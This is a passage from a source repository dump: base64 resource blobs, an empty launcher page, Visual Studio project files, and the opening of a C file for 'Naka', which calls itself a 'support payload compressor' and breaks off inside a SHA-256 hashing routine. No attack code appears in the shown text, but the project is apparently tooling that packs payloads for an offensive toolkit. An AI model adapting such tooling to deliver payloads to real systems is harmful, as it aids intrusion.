AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAACQkJD0lJSYB6enradXV12j4+PoAHBwcPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAABOTk5+qamp/7a2tv+1tbX/m5ub/z09PX4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAJCQkNy9vb3/vb29/7m5uf+wsLD/dXV13AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAl5eX3NfX1//R0dH/xcXF/7m5uf96enrcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AABUVFR+ysrK/+Li4v/W1tb/sbGx/0ZGRn4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAoKCg9WVlaAl5eX2pGRkdpNTU2ACAgIDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCTT4AAAAA AAAAPgAAACgAAACAAAAAIAAAAAEAAQAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA== AQAAABQAAAAAAAAAAgAAAAMAAAA= 0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7/CQAGAAAAAAAAAAAAAAABAAAAAQAAAAAAAAAA EAAAAgAAAAEAAAD+////AAAAAAAAAAD///////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// ///////////////////////////////////////////////////////////////////////////9 /////v////7////+//////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////1IA bwBvAHQAIABFAG4AdAByAHkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAWAAUA//////////8BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFDbnca++tIB AwAAAIABAAAAAAAAbwBjAHgAXwBzAHQAcgBlAGEAbQBvAHIAcwB0AG8AcgBhAGcAZQAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAACgAAgH///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAARgEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP///////////////wAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//////// ////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAA AAIAAAADAAAABAAAAAUAAAD+//////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////9nVWZV AA4AAMhVAABAQgAACAACAAAAAAAIAAAAAAAIAAAAAAAIAA4AAABXAGkAbgBkAG8AdwAAAAgABgAA AC0AMQAAAAgABgAAAC0AMQAAAAgACgAAAEgAaQBnAGgAAAAIAAIAAAAAAAgABgAAAC0AMQAAAAgA AAAAAAgAAgAAAAAACAAQAAAAUwBoAG8AdwBBAGwAbAAAAAgABAAAADAAAAAIAAQAAAAwAAAACAAC AAAAAAAIAAAAAAAIAAIAAAAAAA0AAAAAAAAAAAAAAAAAAAAAAAgABAAAADEAAAAIAAQAAAAwAAAA CAAAAAAACAAEAAAAMAAAAAgACAAAAGEAbABsAAAACAAMAAAAZgBhAGwAcwBlAAAACAAMAAAAZgBh AGwAcwBlAAAACAAEAAAAMAAAAAgADAAAAHMAYwBhAGwAZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA== 
SUwBAQIABAAMABAAEAD/////IRD//////////0JNNgAAAAAAAAA2AAAAKAAAAEAAAAAQAAAAAQAg AAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGajvf9mo73/ZqO9/2ajvf9mo73/Y6C6/2Cctv9c mLH/V5Os/1KOpv9NiKD/SIOb/0R/lv9Be5L/AAAAAAAAAABmo73/ZqO9/2ajvf9mo73/ZqO9/2Og uv9gnLb/XJix/1eTrP9Sjqb/TYig/0iDm/9Ef5b/QXuS/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB6 ssr/j+L5/4LQ8f+C0PH/gtDx/4PR8v+D0fL/g9Hy/4LQ8f+C0PH/gdDw/4HQ8P+C0PD/XJm1/wAA AAAAAAAAerLK/4/i+f+C0PH/gtDx/4LQ8f+D0fL/g9Hy/4PR8v+C0PH/gtDx/4HQ8P+B0PD/gtDw /1yZtf8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 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 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAABCTT4AAAAAAAAAPgAAACgAAABAAAAAEAAAAAEAAQAAAAAAgAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAA////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
[base64-encoded binary image data omitted]
================================================
FILE: Source/Kamikaze/Launcher.html
================================================
================================================
FILE: Source/Naka/Naka.vcxproj
================================================
[MSBuild XML; element tags stripped in extraction, text content only]
Debug Win32 ReleaseInternal Win32 ReleaseInternal x64 Release Win32 Debug x64 Release x64 {3BEF8A16-981F-4C65-8AE7-C612B46BE446} Win32Proj Naka 10.0 Application true v145 Unicode Application false v145 true Unicode Application false v145 true Unicode Application true v145 Unicode false Application false v145 true Unicode false Application false v145 true Unicode false true .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ $(ProjectName)32 SecurityRules.ruleset true .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ $(ProjectName)64 SecurityRules.ruleset false .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ $(ProjectName)32 AllRules.ruleset false .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ $(ProjectName)32 AllRules.ruleset false .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ $(ProjectName)64 AllRules.ruleset false .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ $(ProjectName)64 SecurityRules.ruleset Level4 Disabled WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions) true $(SolutionDir) Windows true main Level4 Disabled _DEBUG;_WINDOWS;%(PreprocessorDefinitions) true $(ProjectDir);$(SolutionDir) Windows true main Level4 MaxSpeed true true WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions) true CompileAsC $(SolutionDir) MultiThreaded Windows true true false true main Level4 MaxSpeed true true WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions) true CompileAsC $(SolutionDir) MultiThreaded Windows true true
false true main \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)32.exe Level4 MaxSpeed true true NDEBUG;_WINDOWS;%(PreprocessorDefinitions) true CompileAsC $(ProjectDir);$(SolutionDir) MultiThreaded true Windows true true false true main Level4 MaxSpeed true true NDEBUG;_WINDOWS;%(PreprocessorDefinitions) true CompileAsC $(ProjectDir);$(SolutionDir) MultiThreaded true Windows true true false true main \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)64.exe
================================================
FILE: Source/Naka/Naka.vcxproj.filters
================================================
{4FC737F1-C7A5-4376-A066-2A32D752A2FF} cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx {93995380-89BD-4b04-88EB-625FBE52EBFB} h;hh;hpp;hxx;hm;inl;inc;xsd {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms {13402ae7-3472-4b63-b943-cade7851a002} Source Files minirtl minirtl minirtl minirtl minirtl minirtl minirtl Header Files minirtl minirtl Header Files
================================================
FILE: Source/Naka/Naka.vcxproj.user
================================================
--stable WindowsLocalDebugger --stable WindowsLocalDebugger WindowsLocalDebugger WindowsLocalDebugger WindowsLocalDebugger WindowsLocalDebugger
================================================
FILE: Source/Naka/main.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2016 - 2025
*
*  TITLE:       MAIN.C
*
*  VERSION:     3.69
*
*  DATE:        07 Jul 2025
*
*  Naka, support payload compressor.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#include "naka.h"

/*
* CreateSha256HashForBuffer
*
* Purpose:
*
* Return SHA256 hash for buffer.
*
*/
BOOL CreateSha256HashForBuffer(
    _In_ PBYTE pbBuffer,
    _In_ DWORD cbBuffer,
    _Out_ PBYTE *pbHash,
    _Out_ PDWORD pcbHash
)
{
    BCRYPT_ALG_HANDLE hAlgSha256 = NULL;
    BCRYPT_HASH_HANDLE hHashSha256 = NULL;
    BOOL bResult = FALSE;
    DWORD cbKeyObject = 0, cbResult = 0;
    PBYTE pbKeyObject = NULL;
    HANDLE hHeap = GetProcessHeap();
    PBYTE _pbHash = NULL;
    DWORD _cbHash = 0;

    do {

        if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(
            &hAlgSha256,
            BCRYPT_SHA256_ALGORITHM,
            NULL,
            0)))
        {
            break;
        }

        //
        // CNG object allocation.
        //
        if (!NT_SUCCESS(BCryptGetProperty(
            hAlgSha256,
            BCRYPT_OBJECT_LENGTH,
            (PUCHAR)&cbKeyObject,
            sizeof(DWORD),
            &cbResult,
            0)))
        {
            break;
        }

        pbKeyObject = (PBYTE)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, cbKeyObject);
        if (pbKeyObject == NULL)
            break;

        //
